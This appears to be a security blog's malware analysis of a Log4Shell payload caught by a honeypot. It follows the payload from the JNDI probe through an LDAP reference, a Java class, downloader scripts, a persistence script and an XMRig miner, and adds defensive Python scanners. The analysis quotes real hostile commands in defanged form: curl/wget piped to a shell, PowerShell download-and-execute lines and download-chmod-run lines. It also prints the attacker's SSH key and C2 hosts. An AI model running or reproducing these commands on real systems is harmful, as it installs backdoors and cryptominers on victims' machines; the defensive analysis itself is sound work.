Anatomy of a Log4J Payload
CVE-2021-44228 (Log4Shell) is still going strong, with scanners throwing payloads at any possible entry point. The following is a look at a payload that recently turned up in a honeypot.
Entry Point
This payload showed up on the honeypot (a simple Python web server using Flask) as a query parameter of the main index page. Any string that ends up in a log line written by a vulnerable Log4j would do; a query parameter is just the easiest thing for a scanner to hit.
http://HONEYPOT[.]IP/?s=$%7Bjndi:ldap:%2F%2F142.93.172[.]227:1389%2FExploit
Grabbing the Payload
To get the payload at the other end, the attacker's LDAP server needs to be queried. This is simple enough to do with curl:
curl ldap://142.93.172[.]227:1389/Exploit
DN: Exploit
javaClassName: foo
javaCodeBase: http://40.76.9[.]118:80/wp-content/themes/twentysixteen/
objectClass: javaNamingReference
javaFactory: Exploit
This is a JNDI reference (objectClass javaNamingReference), and it tells the vulnerable Log4j process where to fetch the class it has been asked to load. The URL is javaCodeBase + javaFactory + ".class" (package dots in the factory name, if any, become path separators). One caveat worth knowing when triaging: remote class loading through an LDAP reference only works when the JVM trusts URL codebases (com.sun.jndi.ldap.object.trustURLCodebase, which has defaulted to false since JDK 8u191 and 11.0.1); against newer runtimes attackers fall back to serialized objects and gadget chains already on the classpath, but a mass-spraying scanner serves the class regardless and hopes for an old JVM.
curl -O http://40.76.9[.]118:80/wp-content/themes/twentysixteen/Exploit.class
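Putting the first three steps together as an added example (written for this write-up, not tooling from the post): a small Python scanner that URL-decodes web-server request lines, resolves Log4j ${...} lookups innermost-first so the usual obfuscations (${lower:j}ndi, ${::-l}dap) collapse back to a plain jndi: URL, and then computes the class URL from an LDAP javaNamingReference the same way the JVM does. The log lines, the LDIF text and the 192.0.2.x / 203.0.113.x addresses are constructed for the example; the attribute names are the ones in the response above.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample web-server log lines (not from the honeypot): one plain
# Log4Shell probe like the one in the post, one obfuscated with nested lookups,
# and one benign request. 192.0.2.x / 203.0.113.x are documentation addresses.
SAMPLE_LOG = [
    '192.0.2.55 - - [01/Jan/2022 10:00:00] "GET /?s=$%7Bjndi:ldap:%2F%2F192.0.2.10:1389%2FExploit%7D HTTP/1.1" 200 -',
    '192.0.2.56 - - [01/Jan/2022 10:00:01] "GET /?x=$%7B$%7Blower:j%7Dndi:$%7B::-l%7Ddap://192.0.2.10:1389/a%7D HTTP/1.1" 200 -',
    '192.0.2.57 - - [01/Jan/2022 10:00:02] "GET /?q=hello HTTP/1.1" 200 -',
]

# Constructed LDAP search result in the same shape as the one the post shows.
SAMPLE_LDIF = """DN: Exploit
javaClassName: foo
javaCodeBase: http://203.0.113.5:80/wp-content/themes/twentysixteen/
objectClass: javaNamingReference
javaFactory: Exploit
"""

# An innermost ${...} lookup: a body with no nested "${" or "}" inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")


def resolve_lookups(text, max_rounds=32):
    """Evaluate Log4j-style ${...} lookups innermost-first and return
    (rewritten_text, jndi_bodies). Handles the common obfuscations ${lower:x},
    ${upper:x} and the default-value trick ${::-x} / ${env:NOPE:-x}; any other
    lookup is replaced by its literal body so the scan still makes progress."""
    found = []
    for _ in range(max_rounds):
        m = INNER_LOOKUP.search(text)
        if not m:
            break
        body = m.group(1)
        key, _, arg = body.partition(":")
        key = key.lower()
        if key == "jndi":
            found.append(body)       # record the fully de-obfuscated jndi lookup
            repl = "<jndi>"          # and stop expanding this branch
        elif key == "lower":
            repl = arg.lower()
        elif key == "upper":
            repl = arg.upper()
        elif ":-" in arg:            # ${x:-default}: the attacker relies on the default
            repl = arg.rsplit(":-", 1)[1]
        else:
            repl = body
        text = text[:m.start()] + repl + text[m.end():]
    return text, found


def jndi_target(body):
    """Split 'jndi:ldap://host:port/path' into its parts."""
    parts = urlsplit(body.split(":", 1)[1])
    return {"scheme": parts.scheme, "host": parts.hostname,
            "port": parts.port, "path": parts.path}


def scan_log(lines):
    """URL-decode each line, resolve lookups and report every jndi lookup found."""
    hits = []
    for n, line in enumerate(lines, 1):
        _, bodies = resolve_lookups(unquote(line))
        for body in bodies:
            hit = {"line": n, "lookup": body}
            hit.update(jndi_target(body))
            hits.append(hit)
    return hits


def reference_class_url(ldif_text):
    """Turn an LDAP javaNamingReference into the URL the JVM fetches:
    javaCodeBase + javaFactory (dots -> slashes) + '.class'.
    LDAP attribute names are case-insensitive, so keys are lower-cased."""
    attrs = {}
    for line in ldif_text.splitlines():
        key, sep, val = line.partition(":")
        if sep:
            attrs.setdefault(key.strip().lower(), []).append(val.strip())
    if "javaNamingReference" not in attrs.get("objectclass", []):
        return None
    base = attrs["javacodebase"][0]
    if not base.endswith("/"):
        base += "/"
    return base + attrs["javafactory"][0].replace(".", "/") + ".class"


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
    print(reference_class_url(SAMPLE_LDIF))
```

The scanner works on any string a vulnerable application might log, so the same function can be pointed at User-Agent, Referer or X-Forwarded-For values pulled from a proxy log, not only the query string seen here.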
Examining the class file
Now, with the first piece of malicious code in hand, it's time to take a look inside. Running strings over the file to pull out anything readable gives the following:
strings Exploit.class
<init>
Code
LineNumberTable
<clinit>
StackMapTable
SourceFile
Exploit.java
java/lang/String
/bin/bash
M(wget -qO - http://51.250.28[.]5/.l/log || curl http://51.250.28[.]5/.l/log) | sh
os.name
powershell
hidden
(new-object System.Net.WebClient).DownloadFile('http://150.60.139[.]51:80/wp-content/themes/twentyseventeen/s.cmd', $env:temp + '/s.cmd');start-process -FilePath 's.cmd' -WorkingDirectory $env:tmp
(new-object System.Net.WebClient).DownloadFile('https://raw.githubusercontent[.]com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat', $env:temp + '/oc.cmd');start-process -FilePath 'oc.cmd' -WorkingDirectory $env:tmp
java/lang/Exception
Exploit
java/lang/Object
[Ljava/lang/String;
java/lang/System
getProperty
&(Ljava/lang/String;)Ljava/lang/String;
toLowerCase
()Ljava/lang/String;
startsWith
(Ljava/lang/String;)Z
java/lang/Runtime
getRuntime
()Ljava/lang/Runtime;
exec
(([Ljava/lang/String;)Ljava/lang/Process;
java/lang/Process
waitFor
Three interesting links popped up there
http://51.250.28[.]5/.l/log
http://150.60.139[.]51:80/wp-content/themes/twentyseventeen/s.cmd
https://raw.githubusercontent[.]com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat
Some kind of log file, a .cmd file hosted on a popped WordPress install, and a link to GitHub for a cryptominer setup. The rest of the strings give away the control flow without a decompiler: the work happens in <clinit>, the static initializer, so the commands run the moment the JVM loads the class; System.getProperty("os.name") is lower-cased and checked with startsWith (presumably against "win") to pick a branch; the Linux branch runs /bin/bash with the wget-or-curl one-liner and the Windows branch runs powershell with a hidden window and the two DownloadFile commands, each via Runtime.exec(String[]) followed by Process.waitFor. The odd leading characters on a few lines (M(, &( and (() are the low byte of each UTF-8 constant's length field, which strings prints whenever it happens to be a printable character.
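strings is fine for a first look, but it cannot tell a string literal from a class or method name, and it glues on those stray length bytes. A small constant-pool parser fixes both. This is an added example written for this write-up, not the author's tooling and not the real Exploit.class: the bytes it parses are a constructed minimal constant pool shaped like the real one (with the post's defanged command string) so that it runs offline, and the strings_like function is a rough emulation of strings(1) included only to show where the stray byte comes from.

```python
import struct

# Constructed sample: the constant pool of a minimal class file shaped like the
# Exploit class in the post (not the real file). The command string is defanged.
SAMPLE_CMD = "(wget -qO - http://51.250.28[.]5/.l/log || curl http://51.250.28[.]5/.l/log) | sh"


def _utf8(s):
    b = s.encode("utf-8")
    return struct.pack(">BH", 1, len(b)) + b


def build_sample_class():
    """Magic, version and a 14-slot constant pool; nothing after the pool."""
    pool = [
        _utf8("Exploit"),                                  # 1
        struct.pack(">BH", 7, 1),                          # 2  Class -> #1
        _utf8("/bin/bash"),                                # 3
        struct.pack(">BH", 8, 3),                          # 4  String -> #3
        _utf8(SAMPLE_CMD),                                 # 5
        struct.pack(">BH", 8, 5),                          # 6  String -> #5
        _utf8("java/lang/Runtime"),                        # 7
        struct.pack(">BH", 7, 7),                          # 8  Class -> #7
        _utf8("exec"),                                     # 9
        _utf8("([Ljava/lang/String;)Ljava/lang/Process;"),  # 10
        struct.pack(">BHH", 12, 9, 10),                    # 11 NameAndType
        struct.pack(">BHH", 10, 8, 11),                    # 12 Methodref
        struct.pack(">BQ", 5, 0),                          # 13 Long (takes slots 13 and 14)
    ]
    header = struct.pack(">IHHH", 0xCAFEBABE, 0, 52, 15)   # Java 8, constant_pool_count = 15
    return header + b"".join(pool)


# Fixed-size constant pool entries: tag -> payload size in bytes.
_FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
          12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}


def parse_constant_pool(data):
    """Walk the constant pool and return {index: (tag, value)}. Utf8 entries
    decode to str, Class/String entries to the index they point at, everything
    else stays as raw payload bytes."""
    magic, _minor, _major, count = struct.unpack_from(">IHHH", data, 0)
    if magic != 0xCAFEBABE:
        raise ValueError("not a class file")
    pool, off, i = {}, 10, 1
    while i < count:
        tag = data[off]
        off += 1
        if tag == 1:                                   # CONSTANT_Utf8: u2 length + bytes
            (length,) = struct.unpack_from(">H", data, off)
            raw = data[off + 2: off + 2 + length]
            # Java stores "modified UTF-8"; for ASCII payloads plain UTF-8 decoding is identical.
            pool[i] = (tag, raw.decode("utf-8", errors="replace"))
            off += 2 + length
        elif tag in _FIXED:
            raw = data[off: off + _FIXED[tag]]
            value = struct.unpack(">H", raw)[0] if tag in (7, 8) else raw
            pool[i] = (tag, value)
            off += _FIXED[tag]
            if tag in (5, 6):                          # Long/Double occupy two slots
                i += 1
        else:
            raise ValueError("unknown constant pool tag %d at offset %d" % (tag, off - 1))
        i += 1
    return pool


def utf8_constants(data):
    """Every Utf8 entry: literals, class names, method names and descriptors."""
    return [v for tag, v in parse_constant_pool(data).values() if tag == 1]


def string_literals(data):
    """Only the Utf8 entries referenced by CONSTANT_String, i.e. the actual
    string literals in the code (commands, URLs), not symbolic names."""
    pool = parse_constant_pool(data)
    return [pool[idx][1] for tag, idx in pool.values() if tag == 8]


def strings_like(data, minlen=4):
    """Rough emulation of strings(1): runs of printable ASCII of at least minlen."""
    out, run = [], bytearray()
    for b in data + b"\x00":
        if 0x20 <= b < 0x7F:
            run.append(b)
        else:
            if len(run) >= minlen:
                out.append(run.decode("ascii"))
            run = bytearray()
    return out


if __name__ == "__main__":
    blob = build_sample_class()
    print("literals:", string_literals(blob))
    print("strings-style:", strings_like(blob))
```

Against the sample the strings-style scan shows the command with its length byte glued to the front, exactly the "M(wget ..." artefact above, while the parser returns only the two real literals. On a real Exploit.class, javap -v prints the same constant pool if a JDK is to hand.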
My log has something to tell you
Looking inside the "log" file:
wget -O /tmp/pty3 http://51.250.28[.]5/.l/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 &
wget -O /tmp/pty4 http://51.250.28[.]5/.l/pty4; chmod +x /tmp/pty4; chmod 700 /tmp/pty4; /tmp/pty4 &
curl -o /tmp/pty3 http://51.250.28[.]5/.l/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 &
curl -o /tmp/pty4 http://51.250.28[.]5/.l/pty4; chmod +x /tmp/pty4; chmod 700 /tmp/pty4; /tmp/pty4 &
(curl http://178.62.105[.]90/wp-content/themes/Grimag/ldm || wget -qO - http://178.62.105[.]90/wp-content/themes/Grimag/ldm)|bash &
This is the entire file. It just downloads and runs more files: each binary is fetched with both wget and curl so that whichever one the box has will work, dropped in /tmp, made executable and backgrounded, and then the ldm script is pulled and piped straight into bash.
pty3 and pty4
pty3 and pty4 are both x86 binaries that the "log" file downloads and executes.
Quick look at pty3
sha256: c01fa3e23232da79e1ee1e722050ab8ac09b90bfebbf93a440bc1316ef7a127c
Running it through strings spits out 750+ lines of nothing immediately useful, but VirusTotal already links to a sandbox analysis: https://www.joesandbox.com/analysis/544445/0/html
Looking into pty4
sha256: 601a9a769138a444dd359058dee0b4d797f8aef42d7c22dfb469bbaf55695ed6
VirusTotal: https://www.virustotal.com/gui/file/601a9a769138a444dd359058dee0b4d797f8aef42d7c22dfb469bbaf55695ed6
Same as pty3, pty4 doesn't give up anything useful under strings, but there is already a sandbox analysis linked from VirusTotal: https://www.joesandbox.com/analysis/544443/0/html
LDM
The last of the "log" file downloads is 200+ lines of bash. Its feature set includes:
- dropping an SSH key (an ssh-rsa public key, i.e. persistent access for whoever holds the private half): AAAAB3NzaC1yc2EAAAABJQAAAQBtGZHLQlMLkrONMAChDVPZf+9gNG5s2rdTMBkOp6P7mKIQ/OkbgiozmZ3syhELI4L0M1TmJiRbbrIta8662z4WAKhXpiU22llfwrkN0m8yKJApd8lDzvvdBw+ShzJr+WaEWX7uW3WCe5NCxGxc6AU7c2vmuLlO0B203pIGVIbV1xJmj6MXrdZpNy7QRo9zStWmgmVY4GR4v26R3XDOn1gshuQ6PgUqgewQ+AlslLVuekdH23sLQfejXyJShcoFI6BbH67YTcoh4G/TuQdGe8lIeAAmp7lzzHMyu+2iSNoFFCeF48JSA2YZvssFOsGuAtV/9uPNQoi9EyvgM2mGDgJ
- setting up a cronjob to update itself
- attempting to enable root login over SSH
- phoning home over Tor
- downloading http://34.221.40[.]237/.x/3sh
sha256: 8e10768d8dfd47c41420e683c6010c3d822783add70c016d3608f0291743cdcc
VirusTotal: https://www.virustotal.com/gui/file/8e10768d8dfd47c41420e683c6010c3d822783add70c016d3608f0291743cdcc/
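A check a responder would want after reading that feature list: an added example (written for this write-up, not from the post or the malware) that hunts a live host, or a mounted disk image, for the behaviours listed above. The indicators are taken from this post: the key prefix is the dropped key, and the hosts and paths are the download locations from the "log" file and ldm, written un-defanged so they match real cron entries. How ldm enables root login is not shown in the post, so the script checks the usual form, PermitRootLogin yes, as an assumption; make_sample_root builds a constructed fake filesystem purely so the example runs offline, and its cron line and keys are made up.

```python
import os
import tempfile

# Indicators from the post: the dropped ssh-rsa key, the files the "log" script
# drops, and the download hosts/paths seen in the "log" file and ldm.
DROPPED_KEY_PREFIX = "AAAAB3NzaC1yc2EAAAABJQAAAQBtGZHLQlMLkrONMAChDVPZf"
DROPPED_FILES = ["tmp/pty3", "tmp/pty4"]
C2_MARKERS = ["51.250.28.5", "178.62.105.90", "34.221.40.237",
              "/.l/log", "/.l/pty", "Grimag/ldm", "/.x/3sh"]
CRON_LOCATIONS = ["etc/crontab", "etc/cron.d", "var/spool/cron", "var/spool/cron/crontabs"]


def _read(path):
    try:
        with open(path, "r", errors="replace") as f:
            return f.read()
    except OSError:
        return ""


def _authorized_keys_files(root):
    files = [os.path.join(root, "root", ".ssh", "authorized_keys")]
    home = os.path.join(root, "home")
    if os.path.isdir(home):
        for user in os.listdir(home):
            files.append(os.path.join(home, user, ".ssh", "authorized_keys"))
    return [f for f in files if os.path.isfile(f)]


def _cron_files(root):
    for rel in CRON_LOCATIONS:
        p = os.path.join(root, rel)
        if os.path.isfile(p):
            yield p
        elif os.path.isdir(p):
            for name in os.listdir(p):
                fp = os.path.join(p, name)
                if os.path.isfile(fp):
                    yield fp


def hunt_ldm_iocs(root="/"):
    """Return (indicator, location) findings for the behaviours in the post.
    root lets the same checks run against a mounted image instead of /."""
    findings = []
    for rel in DROPPED_FILES:
        if os.path.exists(os.path.join(root, rel)):
            findings.append(("dropped binary", rel))
    for path in _authorized_keys_files(root):
        if DROPPED_KEY_PREFIX in _read(path):
            findings.append(("attacker ssh key", os.path.relpath(path, root)))
    for path in _cron_files(root):
        if any(marker in _read(path) for marker in C2_MARKERS):
            findings.append(("cron pulling from C2", os.path.relpath(path, root)))
    # Assumption: "enable root login" means PermitRootLogin yes in sshd_config
    # (the post does not show how ldm does it). Comments are ignored.
    for line in _read(os.path.join(root, "etc/ssh/sshd_config")).splitlines():
        parts = line.split("#", 1)[0].split()
        if len(parts) >= 2 and parts[0].lower() == "permitrootlogin" and parts[1].lower() == "yes":
            findings.append(("root ssh login enabled", "etc/ssh/sshd_config"))
            break
    return findings


def make_sample_root(infected=True):
    """Constructed fake filesystem for an offline run; not a real host image.
    The cron line and the keys are invented for the example."""
    root = tempfile.mkdtemp(prefix="ldm-hunt-")
    for rel in ["tmp", "root/.ssh", "etc/ssh", "var/spool/cron/crontabs", "home/deploy/.ssh"]:
        os.makedirs(os.path.join(root, rel), exist_ok=True)

    def put(rel, text):
        with open(os.path.join(root, rel), "w") as f:
            f.write(text)

    put("etc/ssh/sshd_config",
        "# PermitRootLogin no\nPermitRootLogin yes\n" if infected else "PermitRootLogin no\n")
    put("home/deploy/.ssh/authorized_keys",
        "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPlaceholderKeyNotReal deploy\n")
    if infected:
        put("tmp/pty3", "\x7fELF")
        put("root/.ssh/authorized_keys", "ssh-rsa " + DROPPED_KEY_PREFIX + "...\n")
        put("var/spool/cron/crontabs/root",
            "*/30 * * * * (curl http://178.62.105.90/wp-content/themes/Grimag/ldm "
            "|| wget -qO - http://178.62.105.90/wp-content/themes/Grimag/ldm) | bash\n")
    return root


if __name__ == "__main__":
    for indicator, where in hunt_ldm_iocs(make_sample_root()):
        print("%-24s %s" % (indicator, where))
```

On a real host run it as root (hunt_ldm_iocs() with the default root), or point root at the mount point of an image taken from the box. File presence in /tmp is the weakest of the four checks, since the binaries are easy to rename; the dropped key and the cron entry are what keep the attacker on the machine and are worth checking everywhere the same key might have been sprayed.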
Interesting domains
The first group are public DNS-over-HTTPS resolvers, which lets the script resolve names without going through the host's own resolver or leaving anything in local DNS logs. The last three are one onion address reached through tor2web gateways (tor2web.su, onion.ly, onion.ws), which is how a plain bash script "phones home over Tor" without a Tor client on the box.
doh.defaultroutes.de
dns.hostux.net
dns.dns-over-https.com
uncensored.lux1.dns.nixnet.xyz
dns.rubyfish.cn
dns.twnic.tw
doh.centraleu.pi-dns.com
doh.dns.sb
doh-fi.blahdns.com
fi.doh.dns.snopyta.org
dns.flatuslifir.is
doh.li
dns.digitale-gesellschaft.ch
sgzhooqkd2i3d4z4v7pjhlj2ddbpqoda4v4lcrciblj7nvccepajufad.tor2web.su
sgzhooqkd2i3d4z4v7pjhlj2ddbpqoda4v4lcrciblj7nvccepajufad.onion.ly
sgzhooqkd2i3d4z4v7pjhlj2ddbpqoda4v4lcrciblj7nvccepajufad.onion.ws
s.cmd
The last of the files that were still downloadable at the time of analysis. s.cmd is a Windows batch file that uses PowerShell to pull an XMRig miner from yet another popped WordPress site, then launches it against the supportxmr pool with the wallet below:
powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://68.183.165[.]105:80/wp-content/themes/twentyseventeen/xmrig64.exe','xmrig.exe')
xmrig.exe -o pool.supportxmr[.]com:5555 -u 46QBumovWy4dLJ4R8wq8JwhHKWMhCaDyNDEzvxHFmAHn92EyKrttq6LfV6if5UYDAyCzh3egWXMhnfJJrEhWkMzqTPzGzsE -p log